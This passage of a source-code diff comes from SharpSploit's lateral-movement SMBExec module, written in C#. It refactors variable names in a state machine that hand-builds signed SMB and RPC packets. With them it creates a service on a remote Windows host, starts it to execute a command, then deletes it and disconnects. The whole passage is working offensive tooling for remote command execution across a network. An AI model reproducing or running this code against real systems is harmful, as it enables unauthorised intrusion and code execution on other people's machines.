+                                        Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x00 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_Middle);
+                                        Packet_RPC_Data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_Data.Length - SMB_Split_Index_Tracker + SMB_Split_Index);
+                                        RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
+                                        SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
+                                        Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length);
+                                        SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                                        int RPC_Data_Length = SMB_Data.Length + RPC_Data.Length;
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
+
+                                        if (SMB_Signing)
                                         {
-                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).ToArray();
-                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
+                                            SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
-                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
-                                        if (SMB_split_stage >= SMB_split_stage_final)
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
+                                        if (SMB_Split_Stage >= SMB_Split_Stage_final)
                                         {
                                             SMBClientStage = "CreateServiceW_Last";
                                         }
@@ -1816,37 +1807,36 @@ namespace SharpSploit.LateralMovement
 
                                 case "CreateServiceW_Last":
                                     {
-                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x48 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
-                                        if (SMB_signing)
+                                        Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x48 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
-                                            SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                            Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_Signing_Counter += 2;
+                                            SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
                                         }
-                                        byte[] SCM_data_last = Utilities.GetByteRange(SCM_data, SMB_split_index_tracker, SCM_data.Length);
-                                        SMB_split_index_tracker += SMB_split_index;
-                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x02 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_data_last);
-                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
-                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
-                                        OrderedDictionary packet_SMB_data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_data.Length);
-                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
-                                        int RPC_data_length = SMB_data.Length + RPC_data.Length;
-                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, RPC_data_length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                        if (SMB_signing)
+                                        byte[] SCM_Data_Last = Utilities.GetByteRange(SCM_Data, SMB_Split_Index_Tracker, SCM_Data.Length);
+                                        SMB_Split_Index_Tracker += SMB_Split_Index;
+                                        Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x02 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_Last);
+                                        RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
+                                        SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
+                                        Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length);
+                                        SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                                        int RPC_Data_Length = SMB_Data.Length + RPC_Data.Length;
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
+
+                                        if (SMB_Signing)
                                         {
-                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).ToArray();
-                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
+                                            SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
-                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "ReadAndXRequest";
-                                        SMB_client_stage_next = "StartServiceW";
+                                        SMB_Client_Stage_Next = "StartServiceW";
                                     }
                                     break;
 
@@ -1854,43 +1844,41 @@ namespace SharpSploit.LateralMovement
                                     {
                                         if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 112, 115)) == "00-00-00-00")
                                         {
-                                            SMB_service_context_handle = Utilities.GetByteRange(SMBClientReceive, 92, 111);
-                                            packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
-                                            if (SMB_signing)
+                                            SMB_Service_Context_Handle = Utilities.GetByteRange(SMBClientReceive, 92, 111);
+                                            Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
+                                            if (SMB_Signing)
                                             {
-                                                packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
-                                                SMB_signing_counter += 2;
-                                                byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
-                                                packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                                Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                                SMB_Signing_Counter += 2;
+                                                SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                                Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
                                             }
-                                            OrderedDictionary packet_SCM_data = SMBExec.SCMStartServiceW(SMB_service_context_handle);
-                                            SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
-                                            OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x03, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x13, 0x00 }, null);
-                                            byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
-                                            byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
-                                            OrderedDictionary packet_SMB_data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_data.Length + SCM_data.Length);
-                                            byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
-                                            int RPC_data_length = SMB_data.Length + SCM_data.Length + RPC_data.Length;
-                                            OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, RPC_data_length);
-                                            byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                            if (SMB_signing)
-                                            {
-                                                MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                                byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
+                                            Packet_SCM_Data = SMBExec.SCMStartServiceW(SMB_Service_Context_Handle);
+                                            SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
+                                            Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x03, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x13, 0x00 }, null);
+                                            RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
+                                            SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
+                                            Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length + SCM_Data.Length);
+                                            SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                                            int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
+                                            NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
 
-                                                byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            if (SMB_Signing)
+                                            {
+                                                SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                                SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                                 SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
-                                                packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
-                                                SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                                Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
+                                                SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
                                             }
-                                            SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
-                                            SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                            SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                            SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                             SMBClientStage = "ReadAndXRequest";
-                                            SMB_client_stage_next = "DeleteServiceW";
+                                            SMB_Client_Stage_Next = "DeleteServiceW";
                                         }
                                         else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 112, 115)) == "31-04-00-00")
                                         {
-                                            output.AppendLine(String.Format("Service {0} creation failed on {1}", SMB_service, target));
+                                            output.AppendLine(String.Format("Service {0} creation failed on {1}", SMB_Service, Target));
                                             return output.ToString();
                                         }
                                         else
@@ -1904,184 +1892,179 @@ namespace SharpSploit.LateralMovement
                                     {
                                         if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 91)) == "1D-04-00-00")
                                         {
-                                            if (debug) { output.AppendLine(String.Format("Command Executed with ServiceName: {0} on {1}", SMB_service, target)); }
+                                            if (debug) { output.AppendLine(String.Format("Command Executed with ServiceName: {0} on {1}", SMB_Service, Target)); }
                                         }
                                         else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 91)) == "02-00-00-00")
                                         {
-                                            SMBExec_failed = true;
-                                            if (debug) { output.AppendLine(String.Format("Service {0} failed to start on {1}", SMB_service, target)); }
+                                            SMBExec_Failed = true;
+                                            if (debug) { output.AppendLine(String.Format("Service {0} failed to start on {1}", SMB_Service, Target)); }
                                         }
-                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
+                                        Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
 
-                                        if (SMB_signing)
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
-                                            SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                            Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_Signing_Counter += 2;
+                                            SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
                                         }
 
-                                        OrderedDictionary packet_SCM_data = SMBExec.SCMDeleteServiceW(SMB_service_context_handle);
-                                        SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
-                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x04, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x02, 0x00 }, null);
-                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
-                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
-                                        OrderedDictionary packet_SMB_data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_data.Length + SCM_data.Length);
-                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
-                                        int RPC_data_length = SMB_data.Length + SCM_data.Length + RPC_data.Length;
-                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, RPC_data_length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                        if (SMB_signing)
+                                        Packet_SCM_Data = SMBExec.SCMDeleteServiceW(SMB_Service_Context_Handle);
+                                        SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
+                                        Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x04, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x02, 0x00 }, null);
+                                        RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
+                                        SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
+                                        Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length + SCM_Data.Length);
+                                        SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                                        int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
+
+                                        if (SMB_Signing)
                                         {
-                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
-                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                            SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
-                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "ReadAndXRequest";
-                                        SMB_client_stage_next = "CloseServiceHandle";
-                                        SMB_close_service_handle_stage = 1;
+                                        SMB_Client_Stage_Next = "CloseServiceHandle";
+                                        SMB_Close_Service_Handle_Stage = 1;
                                     }
                                     break;
                                 case "CloseServiceHandle":
                                     {
-                                        OrderedDictionary packet_SCM_data = new OrderedDictionary();
-                                        if (SMB_close_service_handle_stage == 1)
+                                        Packet_SCM_Data = new OrderedDictionary();
+                                        if (SMB_Close_Service_Handle_Stage == 1)
                                         {
-                                            if (debug) { output.AppendLine(String.Format("Service {0} deleted on {1}", SMB_service, target)); }
-                                            service_deleted = true;
-                                            SMB_close_service_handle_stage++;
-                                            packet_SCM_data = SMBExec.SCMCloseServiceHandle(SMB_service_context_handle);
+                                            if (debug) { output.AppendLine(String.Format("Service {0} deleted on {1}", SMB_Service, Target)); }
+                                            Service_Deleted = true;
+                                            SMB_Close_Service_Handle_Stage++;
+                                            Packet_SCM_Data = SMBExec.SCMCloseServiceHandle(SMB_Service_Context_Handle);
                                         }
                                         else
                                         {
                                             SMBClientStage = "CloseRequest";
-                                            packet_SCM_data = SMBExec.SCMCloseServiceHandle(SMB_service_manager_context_handle);
+                                            Packet_SCM_Data = SMBExec.SCMCloseServiceHandle(SMB_Service_Manager_Context_Handle);
                                         }
-                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
+                                        Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
 
-                                        if (SMB_signing)
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
-                                            SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                            Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_Signing_Counter += 2;
+                                            SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
                                         }
-                                        SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
-                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x05, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, null);
-                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
-                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
-                                        OrderedDictionary packet_SMB_data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_data.Length + SCM_data.Length);
-                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
-                                        int RPC_data_length = SMB_data.Length + SCM_data.Length + RPC_data.Length;
-                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, RPC_data_length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                        if (SMB_signing)
+                                        SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
+                                        Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x05, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, null);
+                                        RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
+                                        SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
+                                        Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length + SCM_Data.Length);
+                                        SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                                        int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
+
+                                        if (SMB_Signing)
                                         {
-                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
-                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                            SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
-                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                     }
                                     break;
                                 case "CloseRequest":
                                     {
-                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x04 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
+                                        Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x04 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
 
-                                        if (SMB_signing)
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
-                                            SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                            Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_Signing_Counter += 2;
+                                            SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
                                         }
-                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
-                                        OrderedDictionary packet_SMB_data = SMBExec.SMBCloseRequest(new byte[] { 0x00, 0x40 });
-                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
-                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                        if (SMB_signing)
+                                        SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
+                                        Packet_SMB_Data = SMBExec.SMBCloseRequest(new byte[] { 0x00, 0x40 });
+                                        SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
+
+                                        if (SMB_Signing)
                                         {
-                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).ToArray();
-                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
+                                            SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
-                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "TreeDisconnect";
                                     }
                                     break;
                                 case "TreeDisconnect":
                                     {
-                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x71 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
+                                        Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x71 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
 
-                                        if (SMB_signing)
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
-                                            SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                            Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_Signing_Counter += 2;
+                                            SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
                                         }
-                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
-                                        OrderedDictionary packet_SMB_data = SMBExec.SMBTreeDisconnectRequest();
-                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
